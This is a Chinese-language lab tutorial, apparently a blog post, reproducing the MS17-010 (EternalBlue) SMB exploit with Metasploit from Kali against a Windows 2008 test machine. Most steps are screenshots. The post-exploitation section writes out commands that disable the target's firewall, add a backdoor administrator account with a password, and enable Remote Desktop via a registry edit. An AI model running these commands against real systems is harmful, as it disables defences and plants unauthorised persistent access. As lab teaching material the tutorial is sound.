漏洞复现-MS17-010(永恒之蓝)

漏洞介绍

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无

复现环境

攻击机:kali    IP:192.168.232.130
靶 机:windows 2008 IP:192.168.232.129
启动数据库:Msfdb start 或者 service postgresql start
启动数据库的话运行msf会更快,可开可不开,看自己心情

1、启动msfconsole

输入msfconsole
在这里插入图片描述

2、搜索ms17_010漏洞

在这里插入图片描述

3、用搜索模块对靶机进行漏洞扫描

在这里插入图片描述
在这里插入图片描述
存在漏洞

4、攻击

back,选择攻击模块
在这里插入图片描述
在这里插入图片描述
set payload :设置payload(有效载荷)
在这里插入图片描述
set lhost:设置攻击者IP
在这里插入图片描述
在这里插入图片描述
netsh advfirewall set allprofiles state off
关闭目标防火墙
在这里插入图片描述
在这里插入图片描述

5、后渗透

2008会检测密码复杂性,不能设弱口令密码
创建用户名密码 blue/!@#$1234qwe

C:\Windows\system32>net user blue !@#$1234qwe /add

在这里插入图片描述
将用户blue添加入管理组
C:\Windows\system32>net localgroup administrators blue /add
在这里插入图片描述
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
在这里插入图片描述
远程桌面连接
rdesktop 192.168.232.129:3389
在这里插入图片描述
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值